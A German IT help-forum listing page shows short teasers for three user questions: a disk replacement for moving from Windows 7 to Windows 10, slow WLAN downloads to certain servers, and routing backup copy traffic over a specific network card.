Frage von PluwimVerschlüsselung & Zertifikate23 Kommentare

Guten Morgen, bei mir wird demnächst eine neue Platte fällig, weil ich mein Win7-System auf Win10 umstellen will. D.h. ...

LAN, WAN, Wireless
Warum ist die Datenübertragung per WLAN zu bestimmten Servern sehr langsam?
gelöst Frage von PluwimLAN, WAN, Wireless20 Kommentare

Hallo Netzwerker, beim Einrichten des Notebooks für einen Bekannten fiel mir auf, dass Downloads per WLAN teilweise extrem lahm ...

Router & Routing
Microsoft Server: Kopierlast auf bestimmte NIC legen für Backup
gelöst Frage von LollipopRouter & Routing15 Kommentare

Guten Tag Mit zwei Servern machen wir eine einfache Datenspiegelung als Teil unseres Backup-Systems. Dazu wünsche ich mir einen ...